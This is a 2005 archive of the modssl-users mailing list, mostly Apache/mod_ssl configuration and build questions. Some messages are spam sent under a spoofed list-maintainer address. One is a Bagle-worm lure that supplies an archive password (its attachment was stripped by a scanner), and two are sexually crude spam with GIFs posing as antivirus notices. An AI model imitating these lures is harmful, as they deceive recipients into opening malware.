	for ; Mon, 14 Feb 2005 12:00:49 +0100 (CET)
Received: (qmail 16621 invoked from network); 14 Feb 2005 12:00:49 +0100
Received: from unknown (HELO [172.22.2.121]) ([unknown])
          (envelope-sender )
          by unknown (qmail-ldap-1.03) with SMTP
          for ; 14 Feb 2005 12:00:49 +0100
Message-ID: <421084E4.9090201@spdfraktion.de>
Date: Mon, 14 Feb 2005 12:00:52 +0100
From: Fredo Sartori 
User-Agent: Mozilla Thunderbird 1.0 (X11/20041206)
X-Accept-Language: de-DE, de, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: client certificates and reverse proxies
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at bundestag.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fredo Sartori 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I am setting up an apache server which is accessed via a reverse proxy. 
Client certificates are used for authentication and authorization.

The following setup is already working: the reverse proxy checks the 
validity of the client certificate using the SSLCACertificatePath 
directive. Thereafter data contained in the certificate are passed to 
the backend server either as part of the url or as additional HTTP 
header fields. (First is working properly, second should work, according 
to the description of mod_header.) The backend server uses these 
certificate data to perform an ldap lookup and grants or denies access 
to the resource requested.

BUT: this setup has the drawback that the reverse proxy needs to check 
the client certificates itself. Is there a possibility that the 
verification of the client certificates can be delegated to another 
server, ideally the backend server?

Any hint is welcome

Fredo

-- 
Dr. Fredo Sartori                        Tel. 030-227-55061
SPD-Fraktion im Deutschen Bundestag      FAX  030-227-56169
EDV-Organisation                         e-mail: sartori@spdfraktion.de
Platz der Republik                       WWW: http://www.spdfraktion.de/
11011 Berlin
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb 15 04:35:13 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E93B114EABF; Tue, 15 Feb 2005 04:35:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx-itb.geoph.ITB.ac.id (mx7.ITB.ac.id [167.205.30.13])
	by master.modssl.org (Postfix) with ESMTP id EDB0914EAAF
	for ; Tue, 15 Feb 2005 04:35:12 +0100 (CET)
Received: from antivirus.itb.ac.id (antivirus.ITB.ac.id [167.205.108.137])
	by mx-itb.geoph.ITB.ac.id (Postfix) with SMTP id E270B2125A
	for ; Tue, 15 Feb 2005 10:49:29 +0700 (WIT)
Received: from koordinator (telmat-88.ee.ITB.ac.id [167.205.64.88])
	by mx-itb.geoph.ITB.ac.id (Postfix) with SMTP id 7E21121257
	for ; Tue, 15 Feb 2005 10:49:29 +0700 (WIT)
Date: Tue, 15 Feb 2005 10:37:05 -0800
To: modssl-users@modssl.org
Subject: Hokki =)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------bxrytkqhjeiwavdufpmn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------bxrytkqhjeiwavdufpmn
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Looking forward for  a response :P

..btw, "04604" is a  password  for  archive

----------bxrytkqhjeiwavdufpmn
Content-Type: text/plain
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="TextFile.zip.txt"

***************************************************************
 ** Attachment TextFile.zip was infected with I-Worm.Bagle.ZIP.Gen virus,
 ** attachment part was removed.
 ***************************************************************


----------bxrytkqhjeiwavdufpmn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 17 18:03:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0F0DE14EABE; Thu, 17 Feb 2005 18:03:07 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from humaniteque.humaniteque.com (humaniteque.com [12.164.27.114])
	by master.modssl.org (Postfix) with ESMTP id BF9A414EA95
	for ; Thu, 17 Feb 2005 18:03:06 +0100 (CET)
Received: from 1cust188.vr1.chi2.broadband.uu.net ([63.13.191.188] helo=[192.168.2.2])
	by humaniteque.humaniteque.com with esmtpsa (TLSv1:RC4-SHA:128)
	(Exim 4.43)
	id 1D1p3O-0003qg-GD
	for modssl-users@modssl.org; Thu, 17 Feb 2005 12:03:02 -0500
Mime-Version: 1.0 (Apple Message framework v619.2)
In-Reply-To: <20050217164623.1AD6D14EAC8@master.modssl.org>
References: <20050217164623.1AD6D14EAC8@master.modssl.org>
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: <1fb74efb3c830493e6031083841edc4d@humaniteque.com>
Content-Transfer-Encoding: 7bit
From: Boysenberry Payne 
Subject: A question about mod_ssl with mod_rewrite and .htaccess files
Date: Thu, 17 Feb 2005 11:02:59 -0600
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.619.2)
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - humaniteque.humaniteque.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - humaniteque.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Boysenberry Payne 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I couple of years ago I ran into a situation where I tried using 
mod_ssl via https
and mod_rewrite via .htaccess files.  It didn't work.  My host at the 
time said the
only way to get them to work together was by writing a C workaround.

Now, I'm at the point again where I need to use the two together.  Is 
it possible
now two-three years later, or is it still the chicken before the egg 
situation (i.e.
mod_ssl starts processing the URI before the .htaccess file gets to?)
If so can I use mod_perl with handlers to rewrite regardless?

Thanks ahead of time,
Boysenberry

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 17 20:11:54 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2ADEF14EACC; Thu, 17 Feb 2005 20:11:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from humaniteque.humaniteque.com (humaniteque.com [12.164.27.114])
	by master.modssl.org (Postfix) with ESMTP id BDAF014EA95;
	Thu, 17 Feb 2005 20:11:53 +0100 (CET)
Received: from c-67-175-249-60.client.comcast.net ([67.175.249.60] helo=[192.168.0.3])
	by humaniteque.humaniteque.com with esmtpsa (TLSv1:RC4-SHA:128)
	(Exim 4.43)
	id 1D1r43-0000C1-Q0; Thu, 17 Feb 2005 14:11:51 -0500
In-Reply-To: <20050217164623.1AD6D14EAC8@master.modssl.org>
References: <20050217164623.1AD6D14EAC8@master.modssl.org>
Mime-Version: 1.0 (Apple Message framework v619.2)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: <86d7628013e58fb5b7447b8d797b4c6d@humaniteque.com>
Content-Transfer-Encoding: 7bit
Cc: users@modssl.org
From: Boysenberry Payne 
Subject: A question about mod_ssl with mod_rewrite and .htaccess files
Date: Thu, 17 Feb 2005 13:11:45 -0600
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.619.2)
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - humaniteque.humaniteque.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - humaniteque.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Boysenberry Payne 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I couple of years ago I ran into a situation where I tried using 
mod_ssl via https
and mod_rewrite via .htaccess files.  It didn't work.  My host at the 
time said the
only way to get them to work together was by writing a C workaround.

Now, I'm at the point again where I need to use the two together.  Is 
it possible
now two-three years later, or is it still the chicken before the egg 
situation (i.e.
mod_ssl starts processing the URI before the .htaccess file gets to?)
If so can I use mod_perl with handlers to rewrite regardless?

Thanks ahead of time,
Boysenberry

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 20 07:40:08 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BCC3214EAAF; Sun, 20 Feb 2005 07:40:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id A34FD14DCB8
	for ; Sun, 20 Feb 2005 07:40:02 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id BAA19304
	for ; Sun, 20 Feb 2005 01:47:24 -0500
Date: Sun, 20 Feb 2005 01:47:23 -0500 (EST)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: apache/modssl make fails on slack 10.0
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Nevermind, I found it was none to difficult to just rebuild the package
after talking with Volkerding.

Thanks,

Ron DuFresne

On Sat, 12 Feb 2005, R. DuFresne wrote:

> 
> Not likeing the layout of pache/modssl on slackware, I'm rebuilding a new
> system to replace an older setup, and all fails in the make process with;
> 
> mod_auth_dbm.c:41:18: ndbm.h: No such file or directory
> mod_auth_dbm.c: In function `get_dbm_pw':
> mod_auth_dbm.c:109: error: `DBM' undeclared (first use in this function)
> mod_auth_dbm.c:109: error: (Each undeclared identifier is reported only
> once
> mod_auth_dbm.c:109: error: for each function it appears in.)
> mod_auth_dbm.c:109: error: `f' undeclared (first use in this function)
> mod_auth_dbm.c:110: error: `datum' undeclared (first use in this function)
> mod_auth_dbm.c:110: error: parse error before "d"
> mod_auth_dbm.c:113: error: `q' undeclared (first use in this function)
> mod_auth_dbm.c:127: error: `d' undeclared (first use in this function)
> make[4]: *** [mod_auth_dbm.so] Error 1
> make[3]: *** [all] Error 1
> make[2]: *** [subdirs] Error 1
> make[2]: Leaving directory `/usr/local/src/web/apache_1.3.33/src'
> make[1]: *** [build-std] Error 2
> make[1]: Leaving directory `/usr/local/src/web/apache_1.3.33'
> make: *** [build] Error 2
> 
> 
> the ./configure stage reports this midstram;
> 
> make[1]: Leaving directory `/usr/local/src/web/apache_1.3.33'
> make: *** [build] Error 2
> root@nova:/usr/local/src/web/apache_1.3.33# ./configure
> --enable-module=ssl --enable-shared=ssl --enable-rule=SSL_SDBM
> --enable-module=most --enable-shared=max
> --enable-suexec --suexec-uidmin=100 --suexec-gidmin=70
> --suexec-safepath="/bin:/usr/bin:/usr/local/bin"
> Configuring for Apache, Version 1.3.33
>  + using installation path layout: Apache (config.layout)
> Creating Makefile
> Creating Configuration.apaci in src
>  + enabling mod_so for DSO support
> Creating Makefile in src
>  + configured for Linux platform
>  + setting C compiler to gcc
>  + setting C pre-processor to gcc -E
>  + using "tr [a-z] [A-Z]" to uppercase
>  + checking for system header files
>  + adding selected modules
>     o rewrite_module uses ConfigStart/End
>       disabling DBM support for mod_rewrite
>       (perhaps you need to add -ldbm, -lndbm or -lgdbm to EXTRA_LIBS)
>     o dbm_auth_module uses ConfigStart/End
> 
> so the question how and where do I add the -lgdbm to EXTRA_LIBS to get
> this to build?  even gdbm man page states;
> 
>        If you wish to use the dbm or ndbm compatibility routines,
>        you must link in the gdbm_compat  library  as  well.   For
>        example:
> 
>             gcc -o prog proc.c -lgdbm -lgdbm_compat
> 
> but, which configure.tmpl or Makefile get the addition?
> 
> Thanks,
> 
> 
> Ron DuFresne
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

...Love is the ultimate outlaw.  It just won't adhere to rules.
The most any of us can do is sign on as it's accomplice.  Instead
of vowing to honor and obey, maybe we should swear to aid and abet.
That would mean that security is out of the question.  The words
"make" and "stay" become inappropriate.  My love for you has no
strings attached.  I love you for free...
                        -Tom Robins 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 21 03:31:37 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 64DCB14EAB1; Mon, 21 Feb 2005 03:31:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.30.6.168 (internal-host.pnm.my [161.142.132.201])
	by master.modssl.org (Postfix) with SMTP id 62F6014DCA1
	for ; Mon, 21 Feb 2005 03:31:35 +0100 (CET)
From: "rse" 
To: modssl-users@modssl.org
Subject: Asses Mpeg's
Date: 21 Feb 2005 10:31:34 +0000
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20050221023135.62F6014DCA1@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


u Love asses? Here is a great ass open wide waitin for ur lil Cock
Bye
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 21 17:04:29 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9EC5D14EAB2; Mon, 21 Feb 2005 17:04:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mm-mp3.bizmailsrvcs.net (mm-mp3pub.managedmail.com [206.46.164.44])
	by master.modssl.org (Postfix) with ESMTP id F2C9414DCA1
	for ; Mon, 21 Feb 2005 17:04:28 +0100 (CET)
Received: from TRG16 ([84.45.5.51]) by mm-mp3.bizmailsrvcs.net
          (InterMail vM.5.01.06.05 201-253-122-130-105-20030824) with ESMTP
          id <20050221160427.LXS22117.mm-mp3.bizmailsrvcs.net@TRG16>
          for ; Mon, 21 Feb 2005 10:04:27 -0600
From: "Richard Mundell" 
To: 
Subject: Intermittent page/image loading problems, and anyone got mod_ssl 2.8.22 for Win32 pre-compiled binaries?
Date: Mon, 21 Feb 2005 16:03:43 -0000
Organization: The Roberts Group
Message-ID: <000c01c5182e$eb379da0$d50117ac@trgrp.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Richard Mundell" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Dear all,

I'm currently running with mod_ssl 2.8.16 but I'm seeing intermittent HTTPS
connection errors (such as images not loading) when accessing my Tomcat
application with this configuration:
 
Apache/1.3.29 (Win32) mod_jk/1.1.0 mod_ssl/2.8.16 OpenSSL/0.9.7c
 
It seems worse when going through certain types of proxy server or over
connections with some packet loss.
 
Any one got any ideas?
 
My thought is to try to update to the latest and great mod_ssl (2.8.22) but
I can't find any pre-compiled Win32 binaries. Can anyone help?
 
Thanks,

Richard Mundell
___________________________
Richard Mundell
The Roberts Group
Market Data Expertise that FITS.
+44 (0)20 7374 0008 (office)
+44 (0)20 7374 0002 (support)
+44 (0)7801 570127 (mobile)
Reuters Messenger: richard.mundell@trgrp.com
www.trgrp.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  7 20:27:47 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ADE2F14EA95; Mon,  7 Mar 2005 20:27:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.30.6.168 (CPE0004764da6d1-CM014340029021.cpe.net.cable.rogers.com [24.103.74.128])
	by master.modssl.org (Postfix) with SMTP id ADE1F14DCB8
	for ; Mon,  7 Mar 2005 20:27:46 +0100 (CET)
From: "rse" 
To: modssl-users@modssl.org
Subject: very hot XXX
Date: 07 Mar 2005 15:27:48 -0400
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20050307192746.ADE1F14DCB8@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Video's Girls Erotic WebCam's Tits Mpeg's Girls Ass SEX Pussy Video Clips
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
